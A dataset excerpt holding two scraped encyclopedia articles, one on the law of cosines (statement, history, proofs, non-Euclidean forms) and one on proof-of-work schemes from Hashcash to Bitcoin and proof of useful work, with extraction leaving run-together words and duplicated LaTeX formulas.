text
stringlengths 21
172k
| source
stringlengths 32
113
|
|---|---|
Intrigonometry, thelaw of cosines(also known as thecosine formulaorcosine rule) relates the lengths of the sides of atriangleto thecosineof one of itsangles. For a triangle with sidesa{\displaystyle a},b{\displaystyle b}, andc{\displaystyle c}, opposite respective anglesα{\displaystyle \alpha },β{\displaystyle \beta }, andγ{\displaystyle \gamma }(see Fig. 1), the law of cosines states:
c2=a2+b2−2abcosγ,a2=b2+c2−2bccosα,b2=a2+c2−2accosβ.{\displaystyle {\begin{aligned}c^{2}&=a^{2}+b^{2}-2ab\cos \gamma ,\\[3mu]a^{2}&=b^{2}+c^{2}-2bc\cos \alpha ,\\[3mu]b^{2}&=a^{2}+c^{2}-2ac\cos \beta .\end{aligned}}}
The law of cosines generalizes thePythagorean theorem, which holds only forright triangles: ifγ{\displaystyle \gamma }is aright anglethencosγ=0{\displaystyle \cos \gamma =0}, and the law of cosinesreduces toc2=a2+b2{\displaystyle c^{2}=a^{2}+b^{2}}.
The law of cosines is useful forsolving a trianglewhen all three sides or two sides and their included angle are given.
The theorem is used insolution of triangles, i.e., to find (see Figure 3):
These formulas produce highround-off errorsinfloating pointcalculations if the triangle is very acute, i.e., ifcis small relative toaandborγis small compared to 1. It is even possible to obtain a result slightly greater than one for the cosine of an angle.
The third formula shown is the result of solving forain thequadratic equationa2− 2abcosγ+b2−c2= 0. This equation can have 2, 1, or 0 positive solutions corresponding to the number of possible triangles given the data. It will have two positive solutions ifbsinγ<c<b, only one positive solution ifc=bsinγ, and no solution ifc<bsinγ. These different cases are also explained by theside-side-angle congruence ambiguity.
Book II of Euclid'sElements, compiled c. 300 BC from material up to a century or two older, contains a geometric theorem corresponding to the law of cosines but expressed in the contemporary language of rectangle areas; Hellenistic trigonometry developed later, and sine and cosine per se first appeared centuries afterward in India.
The cases ofobtuse triangles and acute triangles(corresponding to the two cases of negative or positive cosine) are treated separately, in Propositions II.12 and II.13:[1]
Proposition 12.In obtuse-angled triangles the square on the side subtending the obtuse angle is greater than the squares on the sides containing the obtuse angle by twice the rectangle contained by one of the sides about the obtuse angle, namely that on which the perpendicular falls, and the straight line cut off outside by the perpendicular towards the obtuse angle.
Proposition 13 contains an analogous statement for acute triangles. In his (now-lost and only preserved through fragmentary quotations) commentary,Heron of Alexandriaprovided proofs of theconversesof both II.12 and II.13.[2]
Using notation as in Fig. 2, Euclid's statement of proposition II.12 can be represented more concisely (though anachronistically) by the formula
AB2=CA2+CB2+2(CA)(CH).{\displaystyle AB^{2}=CA^{2}+CB^{2}+2(CA)(CH).}
To transform this into the familiar expression for the law of cosines, substituteAB=c{\displaystyle AB=c},CA=b{\displaystyle CA=b},CB=a{\displaystyle CB=a}, andCH=acos(π−γ){\displaystyle CH=a\cos(\pi -\gamma )\ }=−acosγ{\displaystyle \!{}=-a\cos \gamma }.
Proposition II.13 was not used in Euclid's time for thesolution of triangles, but later it was used that way in the course of solving astronomical problems byal-Bīrūnī(11th century) andJohannes de Muris(14th century).[3]Something equivalent to thespherical law of cosineswas used (but not stated in general) byal-Khwārizmī(9th century),al-Battānī(9th century), andNīlakaṇṭha(15th century).[4]
The 13th century Persian mathematicianNaṣīr al-Dīn al-Ṭūsī, in hisKitāb al-Shakl al-qattāʴ(Book on the Complete Quadrilateral, c. 1250), systematically described how to solve triangles from various combinations of given data. Given two sides and their included angle in a scalene triangle, he proposed finding the third side by dropping a perpendicular from the vertex of one of the unknown angles to the opposite base, reducing the problem to finding the legs of one right triangle from a known angle and hypotenuse using thelaw of sinesand then finding the hypotenuse of another right triangle from two known sides by thePythagorean theorem.[5]
About two centuries later, another Persian mathematician,Jamshīd al-Kāshī, who computed the most accurate trigonometric tables of his era, also described the solution of triangles from various combinations of given data in hisMiftāḥ al-ḥisāb(Key of Arithmetic, 1427), and repeated essentially al-Ṭūsī's method, now consolidated into one formula and including more explicit details, as follows:[6]
Another caseis when two sides and the angle between them are known and the rest are unknown. We multiply one of the sides by the sine of the [known] angle one time and by the sine of its complement the other time converted and we subtract the second result from the other side if the angle is acute and add it if the angle is obtuse. We then square the result and add to it the square of the first result. We take the square root of the sum to get the remaining side....
Using modern algebraic notation and conventions this might be written
c=(b−acosγ)2+(asinγ)2{\displaystyle c={\sqrt {(b-a\cos \gamma )^{2}+(a\sin \gamma )^{2}}}}
whenγ{\displaystyle \gamma }is acute or
c=(b+a|cosγ|)2+(asinγ)2{\displaystyle c={\sqrt {\left(b+a\left|\cos \gamma \right|\right)^{2}+\left(a\sin \gamma \right)^{2}}}}
whenγ{\displaystyle \gamma }is obtuse. (Whenγ{\displaystyle \gamma }is obtuse, the modern convention is thatcosγ{\displaystyle \cos \gamma }is negative andcos(π−γ)=−cosγ{\displaystyle \cos(\pi -\gamma )=-\cos \gamma }is positive; historically sines and cosines were considered to be line segments with non-negative lengths.) By squaring both sides,expandingthe squared binomial, and then applying the Pythagorean trigonometric identitycos2γ+sin2γ=1{\displaystyle \cos ^{2}\gamma +\sin ^{2}\gamma =1}, we obtain the familiar law of cosines:
c2=b2−2bacosγ+a2cos2γ+a2sin2γ=a2+b2−2abcosγ.{\displaystyle {\begin{aligned}c^{2}&=b^{2}-2ba\cos \gamma +a^{2}\cos ^{2}\gamma +a^{2}\sin ^{2}\gamma \\[5mu]&=a^{2}+b^{2}-2ab\cos \gamma .\end{aligned}}}
InFrance, the law of cosines is sometimes referred to as thethéorème d'Al-Kashi.[8][9]
The same method used by al-Ṭūsī appeared in Europe as early as the 15th century, inRegiomontanus'sDe triangulis omnimodis(On Triangles of All Kinds, 1464), a comprehensive survey of plane and spherical trigonometry known at the time.[10]
The theorem was first written using algebraic notation byFrançois Viètein the 16th century. At the beginning of the 19th century, modern algebraic notation allowed the law of cosines to be written in its current symbolic form.[11]
Euclidproved this theorem by applying thePythagorean theoremto each of the two right triangles in Fig. 2 (AHBandCHB). Usingato denote the line segmentCB,bto denote the line segmentAC,cto denote the line segmentAB,dto denote the line segmentCHandhfor the heightBH, triangleAHBgives usc2=(b+d)2+h2,{\displaystyle c^{2}=(b+d)^{2}+h^{2},}
and triangleCHBgivesd2+h2=a2.{\displaystyle d^{2}+h^{2}=a^{2}.}
Expandingthe first equation givesc2=b2+2bd+d2+h2.{\displaystyle c^{2}=b^{2}+2bd+d^{2}+h^{2}.}
Substituting the second equation into this, the following can be obtained:c2=a2+b2+2bd.{\displaystyle c^{2}=a^{2}+b^{2}+2bd.}
This is Euclid's Proposition 12 from Book 2 of theElements.[12]To transform it into the modern form of the law of cosines, note thatd=acos(π−γ)=−acosγ.{\displaystyle d=a\cos(\pi -\gamma )=-a\cos \gamma .}
Euclid's proof of his Proposition 13 proceeds along the same lines as his proof of Proposition 12: he applies the Pythagorean theorem to both right triangles formed by dropping the perpendicular onto one of the sides enclosing the angleγand uses the square of a difference to simplify.
Using more trigonometry, the law of cosines can be deduced by using the Pythagorean theorem only once. In fact, by using the right triangle on the left hand side of Fig. 6 it can be shown that:
c2=(b−acosγ)2+(asinγ)2=b2−2abcosγ+a2cos2γ+a2sin2γ=b2+a2−2abcosγ,{\displaystyle {\begin{aligned}c^{2}&=(b-a\cos \gamma )^{2}+(a\sin \gamma )^{2}\\&=b^{2}-2ab\cos \gamma +a^{2}\cos ^{2}\gamma +a^{2}\sin ^{2}\gamma \\&=b^{2}+a^{2}-2ab\cos \gamma ,\end{aligned}}}
using thetrigonometric identitycos2γ+sin2γ=1{\displaystyle \cos ^{2}\gamma +\sin ^{2}\gamma =1}.
This proof needs a slight modification ifb<acos(γ). In this case, the right triangle to which the Pythagorean theorem is applied movesoutsidethe triangleABC. The only effect this has on the calculation is that the quantityb−acos(γ)is replaced byacos(γ) −b.As this quantity enters the calculation only through its square, the rest of the proof is unaffected. However, this problem only occurs whenβis obtuse, and may be avoided by reflecting the triangle about the bisector ofγ.
Referring to Fig. 6 it is worth noting that if the angle opposite sideaisαthen:tanα=asinγb−acosγ.{\displaystyle \tan \alpha ={\frac {a\sin \gamma }{b-a\cos \gamma }}.}
This is useful for direct calculation of a second angle when two sides and an included angle are given.
Thealtitudethrough vertexCis a segment perpendicular to sidec. The distance from the foot of the altitude to vertexAplus the distance from the foot of the altitude to vertexBis equal to the length of sidec(see Fig. 5). Each of these distances can be written as one of the other sides multiplied by the cosine of the adjacent angle,[13]c=acosβ+bcosα.{\displaystyle c=a\cos \beta +b\cos \alpha .}
(This is still true ifαorβis obtuse, in which case the perpendicular falls outside the triangle.) Multiplying both sides bycyieldsc2=accosβ+bccosα.{\displaystyle c^{2}=ac\cos \beta +bc\cos \alpha .}
The same steps work just as well when treating either of the other sides as the base of the triangle:a2=accosβ+abcosγ,b2=bccosα+abcosγ.{\displaystyle {\begin{aligned}a^{2}&=ac\cos \beta +ab\cos \gamma ,\\[3mu]b^{2}&=bc\cos \alpha +ab\cos \gamma .\end{aligned}}}
Taking the equation forc2{\displaystyle c^{2}}and subtracting the equations forb2{\displaystyle b^{2}}anda2{\displaystyle a^{2}},c2−a2−b2=accosβ+bccosα−accosβ−bccosα−2abcosγc2=a2+b2−2abcosγ.{\displaystyle {\begin{aligned}c^{2}-a^{2}-b^{2}&={\color {BlueGreen}{\cancel {\color {Black}ac\cos \beta }}}+{\color {Peach}{\cancel {\color {Black}bc\cos \alpha }}}-{\color {BlueGreen}{\cancel {\color {Black}ac\cos \beta }}}-{\color {Peach}{\cancel {\color {Black}bc\cos \alpha }}}-2ab\cos \gamma \\c^{2}&=a^{2}+b^{2}-2ab\cos \gamma .\end{aligned}}}
This proof is independent of thePythagorean theorem, insofar as it is based only on the right-triangle definition of cosine and obtains squared side lengths algebraically. Other proofs typically invoke the Pythagorean theorem explicitly, and are more geometric, treatingacosγas a label for the length of a certain line segment.[13]
Unlike many proofs, this one handles the cases of obtuse and acute anglesγin a unified fashion.
Consider a triangle with sides of lengtha,b,c, whereθis the measurement of the angle opposite the side of lengthc. This triangle can be placed on theCartesian coordinate systemwith sideaaligned along thexaxis and angleθplaced at the origin, by plotting the components of the 3 points of the triangle as shown in Fig. 4:A=(bcosθ,bsinθ),B=(a,0),andC=(0,0).{\displaystyle A=(b\cos \theta ,b\sin \theta ),B=(a,0),{\text{ and }}C=(0,0).}
By thedistance formula,[14]
c=(a−bcosθ)2+(0−bsinθ)2.{\displaystyle c={\sqrt {(a-b\cos \theta )^{2}+(0-b\sin \theta )^{2}}}.}
Squaring both sides and simplifyingc2=(a−bcosθ)2+(−bsinθ)2=a2−2abcosθ+b2cos2θ+b2sin2θ=a2+b2(sin2θ+cos2θ)−2abcosθ=a2+b2−2abcosθ.{\displaystyle {\begin{aligned}c^{2}&=(a-b\cos \theta )^{2}+(-b\sin \theta )^{2}\\&=a^{2}-2ab\cos \theta +b^{2}\cos ^{2}\theta +b^{2}\sin ^{2}\theta \\&=a^{2}+b^{2}(\sin ^{2}\theta +\cos ^{2}\theta )-2ab\cos \theta \\&=a^{2}+b^{2}-2ab\cos \theta .\end{aligned}}}
An advantage of this proof is that it does not require the consideration of separate cases depending on whether the angleγis acute, right, or obtuse. However, the cases treated separately inElementsII.12–13 and later by al-Ṭūsī, al-Kāshī, and others could themselves be combined by using concepts of signed lengths and areas and a concept of signed cosine, without needing a full Cartesian coordinate system.
Referring to the diagram, triangleABCwith sidesAB=c,BC=aandAC=bis drawn inside its circumcircle as shown. TriangleABDis constructed congruent to triangleABCwithAD=BCandBD=AC. Perpendiculars fromDandCmeet baseABatEandFrespectively. Then:BF=AE=BCcosB^=acosB^⇒DC=EF=AB−2BF=c−2acosB^.{\displaystyle {\begin{aligned}&BF=AE=BC\cos {\hat {B}}=a\cos {\hat {B}}\\\Rightarrow \ &DC=EF=AB-2BF=c-2a\cos {\hat {B}}.\end{aligned}}}
Now the law of cosines is rendered by a straightforward application ofPtolemy's theoremtocyclic quadrilateralABCD:AD×BC+AB×DC=AC×BD⇒a2+c(c−2acosB^)=b2⇒a2+c2−2accosB^=b2.{\displaystyle {\begin{aligned}&AD\times BC+AB\times DC=AC\times BD\\\Rightarrow \ &a^{2}+c(c-2a\cos {\hat {B}})=b^{2}\\\Rightarrow \ &a^{2}+c^{2}-2ac\cos {\hat {B}}=b^{2}.\end{aligned}}}
Plainly if angleBisright, thenABCDis a rectangle and application of Ptolemy's theorem yields thePythagorean theorem:a2+c2=b2.{\displaystyle a^{2}+c^{2}=b^{2}.}
One can also prove the law of cosines by calculatingareas. The change of sign as the angleγbecomes obtuse makes a case distinction necessary.
Recall that
Acute case.Figure 7a shows aheptagoncut into smaller pieces (in two different ways) to yield a proof of the law of cosines. The various pieces are
The equality of areas on the left and on the right givesa2+b2=c2+2abcosγ.{\displaystyle a^{2}+b^{2}=c^{2}+2ab\cos \gamma .}
Obtuse case.Figure 7b cuts ahexagonin two different ways into smaller pieces, yielding a proof of the law of cosines in the case that the angleγis obtuse. We have
The equality of areas on the left and on the right givesa2+b2−2abcos(γ)=c2.{\displaystyle a^{2}+b^{2}-2ab\cos(\gamma )=c^{2}.}
The rigorous proof will have to include proofs that various shapes arecongruentand therefore have equal area. This will use the theory ofcongruent triangles.
Using thegeometry of the circle, it is possible to give a moregeometricproof than using thePythagorean theoremalone.Algebraicmanipulations (in particular thebinomial theorem) are avoided.
Case of acute angleγ, wherea> 2bcosγ.Drop theperpendicularfromAontoa=BC, creating a line segment of lengthbcosγ. Duplicate theright triangleto form theisosceles triangleACP. Construct thecirclewith centerAand radiusb, and itstangenth=BHthroughB. The tangenthforms a right angle with the radiusb(Euclid'sElements: Book 3, Proposition 18; or seehere), so the yellow triangle in Figure 8 is right. Apply thePythagorean theoremto obtainc2=b2+h2.{\displaystyle c^{2}=b^{2}+h^{2}.}
Then use thetangent secant theorem(Euclid'sElements: Book 3, Proposition 36), which says that the square on the tangent through a pointBoutside the circle is equal to the product of the two lines segments (fromB) created by anysecantof the circle throughB. In the present case:BH2=BC·BP, orh2=a(a−2bcosγ).{\displaystyle h^{2}=a(a-2b\cos \gamma ).}
Substituting into the previous equation gives the law of cosines:c2=b2+a(a−2bcosγ).{\displaystyle c^{2}=b^{2}+a(a-2b\cos \gamma ).}
Note thath2is thepowerof the pointBwith respect to the circle. The use of the Pythagorean theorem and the tangent secant theorem can be replaced by a single application of thepower of a point theorem.
Case of acute angleγ, wherea< 2bcosγ.Drop theperpendicularfromAontoa=BC, creating a line segment of lengthbcosγ. Duplicate theright triangleto form theisosceles triangleACP. Construct thecirclewith centerAand radiusb, and achordthroughBperpendicular toc=AB,half of which ish=BH.Apply thePythagorean theoremto obtainb2=c2+h2.{\displaystyle b^{2}=c^{2}+h^{2}.}
Now use thechord theorem(Euclid'sElements: Book 3, Proposition 35), which says that if two chords intersect, the product of the two line segments obtained on one chord is equal to the product of the two line segments obtained on the other chord. In the present case:BH2=BC·BP,orh2=a(2bcosγ−a).{\displaystyle h^{2}=a(2b\cos \gamma -a).}
Substituting into the previous equation gives the law of cosines:b2=c2+a(2bcosγ−a).{\displaystyle b^{2}=c^{2}+a(2b\cos \gamma -a).}
Note that the power of the pointBwith respect to the circle has the negative value−h2.
Case of obtuse angleγ.This proof uses the power of a point theorem directly, without the auxiliary triangles obtained by constructing a tangent or a chord. Construct a circle with centerBand radiusa(see Figure 9), which intersects thesecantthroughAandCinCandK. Thepowerof the pointAwith respect to the circle is equal to bothAB2−BC2andAC·AK. Therefore,c2−a2=b(b+2acos(π−γ))=b(b−2acosγ),{\displaystyle {\begin{aligned}c^{2}-a^{2}&{}=b(b+2a\cos(\pi -\gamma ))\\&{}=b(b-2a\cos \gamma ),\end{aligned}}}
which is the law of cosines.
Using algebraic measures for line segments (allowingnegative numbersas lengths of segments) the case of obtuse angle (CK> 0) and acute angle (CK< 0) can be treated simultaneously.
The law of cosines can be proven algebraically from thelaw of sinesand a few standard trigonometric identities.[15]To start, three angles of a triangle sum to astraight angle(α+β+γ=π{\displaystyle \alpha +\beta +\gamma =\pi }radians). Thus by the angle sum identities for sine and cosine,
sinγ=−sin(π−γ)=−sin(α+β)=sinαcosβ+cosαsinβ,cosγ=−cos(π−γ)=−cos(α+β)=sinαsinβ−cosαcosβ.{\displaystyle {\begin{alignedat}{3}\sin \gamma &={\phantom {-}}\sin(\pi -\gamma )&&={\phantom {-}}\sin(\alpha +\beta )&&=\sin \alpha \,\cos \beta +\cos \alpha \,\sin \beta ,\\[5mu]\cos \gamma &=-\cos(\pi -\gamma )&&=-\cos(\alpha +\beta )&&=\sin \alpha \,\sin \beta -\cos \alpha \,\cos \beta .\end{alignedat}}}
Squaring the first of these identities, then substitutingcosαcosβ={\displaystyle \cos \alpha \,\cos \beta ={}}sinαsinβ−cosγ{\displaystyle \sin \alpha \,\sin \beta -\cos \gamma }from the second, and finally replacingcos2α+sin2α={\displaystyle \cos ^{2}\alpha +\sin ^{2}\alpha ={}}cos2β+sin2β=1,{\displaystyle \cos ^{2}\beta +\sin ^{2}\beta =1,}thePythagorean trigonometric identity, we have:
sin2γ=(sinαcosβ+cosαsinβ)2=sin2αcos2β+2sinαsinβcosαcosβ+cos2αsin2β=sin2αcos2β+2sinαsinβ(sinαsinβ−cosγ)+cos2αsin2β=sin2α(cos2β+sin2β)+sin2β(cos2α+sin2α)−2sinαsinβcosγ=sin2α+sin2β−2sinαsinβcosγ.{\displaystyle {\begin{aligned}\sin ^{2}\gamma &=(\sin \alpha \,\cos \beta +\cos \alpha \,\sin \beta )^{2}\\[3mu]&=\sin ^{2}\alpha \,\cos ^{2}\beta +2\sin \alpha \,\sin \beta \,\cos \alpha \,\cos \beta +\cos ^{2}\alpha \,\sin ^{2}\beta \\[3mu]&=\sin ^{2}\alpha \,\cos ^{2}\beta +2\sin \alpha \,\sin \beta (\sin \alpha \,\sin \beta -\cos \gamma )+\cos ^{2}\alpha \,\sin ^{2}\beta \\[3mu]&=\sin ^{2}\alpha (\cos ^{2}\beta +\sin ^{2}\beta )+\sin ^{2}\beta (\cos ^{2}\alpha +\sin ^{2}\alpha )-2\sin \alpha \,\sin \beta \,\cos \gamma \\[3mu]&=\sin ^{2}\alpha +\sin ^{2}\beta -2\sin \alpha \,\sin \beta \,\cos \gamma .\end{aligned}}}
The law of sines holds thatasinαβ=bsinβ=csinγβ=k,{\displaystyle {\frac {a}{\sin \alpha {\vphantom {\beta }}}}={\frac {b}{\sin \beta }}={\frac {c}{\sin \gamma {\vphantom {\beta }}}}=k,}
so to prove the law of cosines, we multiply both sides of our previous identity byk2{\displaystyle k^{2}}:
sin2γc2sin2γ=sin2αa2sin2α+sin2βb2sin2β−2sinαsinβcosγabsinαsinβsin2c2=a2+b2−2abcosγ.{\displaystyle {\begin{aligned}\sin ^{2}\gamma {\frac {c^{2}}{\sin ^{2}\gamma }}&=\sin ^{2}\alpha {\frac {a^{2}}{\sin ^{2}\alpha }}+\sin ^{2}\beta {\frac {b^{2}}{\sin ^{2}\beta }}-2\sin \alpha \,\sin \beta \,\cos \gamma {\frac {ab}{\sin \alpha \,\sin \beta {\vphantom {\sin ^{2}}}}}\\[10mu]c^{2}&=a^{2}+b^{2}-2ab\cos \gamma .\end{aligned}}}
This concludes the proof.
Denote
CB→=a→,CA→=b→,AB→=c→{\displaystyle {\overrightarrow {CB}}={\vec {a}},\ {\overrightarrow {CA}}={\vec {b}},\ {\overrightarrow {AB}}={\vec {c}}}
Therefore,c→=a→−b→{\displaystyle {\vec {c}}={\vec {a}}-{\vec {b}}}
Taking thedot productof each side with itself:c→⋅c→=(a→−b→)⋅(a→−b→)‖c→‖2=‖a→‖2+‖b→‖2−2a→⋅b→{\displaystyle {\begin{aligned}{\vec {c}}\cdot {\vec {c}}&=({\vec {a}}-{\vec {b}})\cdot ({\vec {a}}-{\vec {b}})\\\Vert {\vec {c}}\Vert ^{2}&=\Vert {\vec {a}}\Vert ^{2}+\Vert {\vec {b}}\Vert ^{2}-2\,{\vec {a}}\cdot {\vec {b}}\end{aligned}}}
Using the identity
u→⋅v→=‖u→‖‖v→‖cos∠(u→,v→){\displaystyle {\vec {u}}\cdot {\vec {v}}=\Vert {\vec {u}}\Vert \,\Vert {\vec {v}}\Vert \cos \angle ({\vec {u}},\ {\vec {v}})}
leads to
‖c→‖2=‖a→‖2+‖b→‖2−2‖a→‖‖b→‖cos∠(a→,b→){\displaystyle \Vert {\vec {c}}\Vert ^{2}=\Vert {\vec {a}}\Vert ^{2}+{\Vert {\vec {b}}\Vert }^{2}-2\,\Vert {\vec {a}}\Vert \!\;\Vert {\vec {b}}\Vert \cos \angle ({\vec {a}},\ {\vec {b}})}
The result follows.
Whena=b, i.e., when the triangle isisosceleswith the two sides incident to the angleγequal, the law of cosines simplifies significantly. Namely, becausea2+b2= 2a2= 2ab, the law of cosines becomescosγ=1−c22a2{\displaystyle \cos \gamma =1-{\frac {c^{2}}{2a^{2}}}}
orc2=2a2(1−cosγ).{\displaystyle c^{2}=2a^{2}(1-\cos \gamma ).}
Given an arbitrarytetrahedronwhose four faces have areasA,B,C, andD, withdihedral angleφab{\displaystyle \varphi _{ab}}between facesAandB, etc., a higher-dimensional analogue of the law of cosines is:[16]A2=B2+C2+D2−2(BCcosφbc+CDcosφcd+DBcosφdb).{\displaystyle A^{2}=B^{2}+C^{2}+D^{2}-2\left(BC\cos \varphi _{bc}+CD\cos \varphi _{cd}+DB\cos \varphi _{db}\right).}
When the angle,γ, is small and the adjacent sides,aandb, are of similar length, the right hand side of the standard form of the law of cosines is subject tocatastrophic cancellationin numerical approximations. In situations where this is an important concern, a mathematically equivalent version of the law of cosines, similar to thehaversine formula, can prove useful:c2=(a−b)2+4absin2(γ2)=(a−b)2+4abhaversin(γ).{\displaystyle {\begin{aligned}c^{2}&=(a-b)^{2}+4ab\sin ^{2}\left({\frac {\gamma }{2}}\right)\\&=(a-b)^{2}+4ab\operatorname {haversin} (\gamma ).\end{aligned}}}
In the limit of an infinitesimal angle, the law of cosines degenerates into thecircular arc lengthformula,c=aγ.
As in Euclidean geometry, one can use the law of cosines to determine the anglesA,B,Cfrom the knowledge of the sidesa,b,c. In contrast to Euclidean geometry, the reverse is also possible in both non-Euclidean models: the anglesA,B,Cdetermine the sidesa,b,c.
A triangle is defined by three pointsu,v, andwon the unit sphere, and the arcs ofgreat circlesconnecting those points. If these great circles make anglesA,B, andCwith opposite sidesa,b,cthen thespherical law of cosinesasserts that all of the following relationships hold:
cosa=cosbcosc+sinbsinccosAcosA=−cosBcosC+sinBsinCcosacosa=cosA+cosBcosCsinBsinC.{\displaystyle {\begin{aligned}\cos a&=\cos b\cos c+\sin b\sin c\cos A\\\cos A&=-\cos B\cos C+\sin B\sin C\cos a\\\cos a&={\frac {\cos A+\cos B\cos C}{\sin B\sin C}}.\end{aligned}}}
Inhyperbolic geometry, a pair of equations are collectively known as thehyperbolic law of cosines. The first iscosha=coshbcoshc−sinhbsinhccosA{\displaystyle \cosh a=\cosh b\cosh c-\sinh b\sinh c\cos A}
wheresinhandcoshare thehyperbolic sine and cosine, and the second iscosA=−cosBcosC+sinBsinCcosha.{\displaystyle \cos A=-\cos B\cos C+\sin B\sin C\cosh a.}
The length of the sides can be computed by:
cosha=cosA+cosBcosCsinBsinC.{\displaystyle \cosh a={\frac {\cos A+\cos B\cos C}{\sin B\sin C}}.}
The law of cosines can be generalized to allpolyhedraby considering any polyhedron with vector sides and invoking thedivergence Theorem.[17]
|
https://en.wikipedia.org/wiki/Law_of_cosines
|
Proof of work(also written asproof-of-work, an abbreviatedPoW) is a form ofcryptographicproofin which one party (theprover) proves to others (theverifiers) that a certain amount of a specific computational effort has been expended.[1]Verifiers can subsequently confirm this expenditure with minimal effort on their part. The concept was first implemented inHashcashbyMoni NaorandCynthia Dworkin 1993 as a way to deterdenial-of-service attacksand other service abuses such asspamon a network by requiring some work from a service requester, usually meaning processing time by a computer. The term "proof of work" was first coined and formalized in a 1999 paper byMarkus Jakobssonand Ari Juels.[2][3]The concept was adapted to digital tokens byHal Finneyin 2004 through the idea of "reusable proof of work" using the 160-bit secure hash algorithm 1 (SHA-1).[4]
Proof of work was later popularized byBitcoinas a foundation for consensus in a permissionless decentralized network, in which miners compete to append blocks and mine new currency, each miner experiencing a success probability proportional to the computational effort expended. PoW and PoS (proof of stake) remain the two best knownSybil deterrence mechanisms. In the context ofcryptocurrenciesthey are the most common mechanisms.[5]
A key feature of proof-of-work schemes is their asymmetry: thework– the computation – must be moderately hard (yet feasible) on the prover or requester side but easy to check for the verifier or service provider. This idea is also known as a CPU cost function,client puzzle, computational puzzle, or CPU pricing function. Another common feature is built-inincentive-structures that reward allocating computational capacity to the network withvaluein the form of cryptocurrency.[6][7]
The purpose of proof-of-work algorithms is not proving that certainworkwas carried out or that a computational puzzle was "solved", but deterring manipulation of data by establishing large energy and hardware-control requirements to be able to do so.[6]Proof-of-work systems have been criticized by environmentalists for their energy consumption.[8]
The concept of Proof of Work (PoW) has its roots in early research on combating spam and preventing denial-of-service attacks. One of the earliest implementations of PoW wasHashcash, created by British cryptographerAdam Backin 1997.[9]It was designed as an anti-spam mechanism that required email senders to perform a small computational task, effectively proving that they expended resources (in the form of CPU time) before sending an email. This task was trivial for legitimate users but would impose a significant cost on spammers attempting to send bulk messages.
Hashcash's system was based on the concept of finding a hash value that met certain criteria, a task that required computational effort and thus served as a "proof of work." The idea was that by making it computationally expensive to send large volumes of email,spammingwould be reduced.
One popular system, used in Hashcash, uses partial hash inversions to prove that computation was done, as a goodwill token to send ane-mail. For instance, the following header represents about 252hash computations to send a message tocalvin@comics.neton January 19, 2038:
It is verified with a single computation by checking that theSHA-1hash of the stamp (omit the header nameX-Hashcash:including the colon and any amount of whitespace following it up to the digit '1') begins with 52 binary zeros, that is 13 hexadecimal zeros:[1]
Whether PoW systems can actually solve a particular denial-of-service issue such as the spam problem is subject to debate;[10][11]the system must make sending spam emails obtrusively unproductive for the spammer, but should also not prevent legitimate users from sending their messages. In other words, a genuine user should not encounter any difficulties when sending an email, but an email spammer would have to expend a considerable amount of computing power to send out many emails at once. Proof-of-work systems are being used by other, more complex cryptographic systems such as Bitcoin, which uses a system similar to Hashcash.[10]
Proof of work traces its theoretical origins to early efforts to combat digital abuse, evolving significantly over time to address security, accessibility, and broader applications beyond its initial anti-spam purpose. The idea first emerged in 1993 as a deterrent for junk mail, but it wasSatoshi Nakamoto’s 2008 whitepaper, "Bitcoin: A Peer-to-Peer Electronic Cash System,"[12]that solidified proof of work's potential as a cornerstone of blockchain networks. This development reflects the rising demands for secure, trustless systems.
The earliest appearance of proof of work was in 1993, whenCynthia DworkandMoni Naorproposed a system to curb junk email by requiring senders to perform computationally demanding tasks. In their paper, "Pricing via Processing or Combatting Junk Mail,"[13]they outlined methods such as computing modular square roots, designed to be challenging to solve yet straightforward to verify, establishing a foundational principle of proof of work’s asymmetry. This asymmetry is the crucial to the effectiveness of proof of work, ensuring that tasks like sending spam are costly for attackers, while verification remains efficient for legitimate users.
This conceptual groundwork found practical use in 1997 withAdam Back’s Hashcash, a system that required senders to compute a partial hash inversion of theSHA-1algorithm, producing a hash with a set number of leading zeros. Described in Back’s paper "Hashcash: A Denial of Service Counter-Measure,"[14]Hashcash imposed a computational cost to deter spam while allowing recipients to confirm the work effortlessly, laying a critical foundation for subsequent proof of work implementations in cryptography and blockchain technology.
Bitcoin, launched in 2009 by Satoshi Nakamoto, marked a pivotal shift by adapting Hashcash’s proof of work for cryptocurrency. Nakamoto’s Bitcoin whitepaper outlined a system using theSHA-256algorithm, where miners compete to solve cryptographic puzzles to append blocks to the blockchain, earning rewards in the process. Unlike Hashcash’s static proofs, Bitcoin’s proof of work algorithm dynamically adjusts its difficulty based on the time taken to mine the previous block, ensuring a consistent block time of approximately 10 minutes, creating a tamper-proof chain. This innovation transformed proof of work from a standalone deterrent into a consensus mechanism for a decentralized network, emphasizing financial incentives over computational effort.
However, Bitcoin was not perfect. Miners began exploiting Bitcoin's proof of work with specialized hardware likeASICs. Initially mined with standardCPUs, Bitcoin saw a rapid transition toGPUsand then to ASIC, which vastly outperformed general hardware in solving SHA-256 puzzles. This gave ASICs miners an overwhelming advantage, rendering casual participants insignificant, which undermines Bitcoin's initial vision of a decentralized network accessible to all.
To address Bitcoin’s increasing reliance on specialized hardware, proof of work evolved further with the introduction ofLitecoinin 2011, which adopted theScryptalgorithm. Developed byColin Percivaland detailed in the technical specification "The scrypt Password-Based Key Derivation Function,"[15]Scrypt was designed as a memory-intensive algorithm, requiring significant RAM to perform its computations. Unlike Bitcoin’s SHA-256, which favored powerful ASICs, Scrypt aimed to level the playing field by making mining more accessible to users with general-purpose hardware through heightened memory demands. However, over time, advancements in hardware led to the creation of Scrypt-specific ASICs, shifting the advantage back toward specialized hardware and reducing the algorithm's goal for decentralization.
There are two classes of proof-of-work protocols.
Known-solution protocols tend to have slightly lower variance than unbounded probabilistic protocols because the variance of arectangular distributionis lower than the variance of aPoisson distribution(with the same mean).[further explanation needed]A generic technique for reducing variance is to use multiple independent sub-challenges, as the average of multiple samples will have a lower variance.
There are also fixed-cost functions such as the time-lock puzzle.
Moreover, the underlying functions used by these schemes may be:
Finally, some PoW systems offershortcutcomputations that allow participants who know a secret, typically a private key, to generate cheap PoWs. The rationale is that mailing-list holders may generate stamps for every recipient without incurring a high cost. Whether such a feature is desirable depends on the usage scenario.
Here is a list of known proof-of-work functions:
At theIACRconference Crypto 2022 researchers presented a paper describing Ofelimos, a blockchain protocol with aconsensus mechanismbased on "proof of useful work" (PoUW). Rather than miners consuming energy in solving complex, but essentially useless, puzzles to validate transactions, Ofelimos achieves consensus while simultaneously providing a decentralizedoptimization problem solver. The protocol is built around Doubly Parallel Local Search (DPLS), a local search algorithm that is used as the PoUW component. The paper gives an example that implements a variant ofWalkSAT, a local search algorithm to solve Boolean problems.[29]
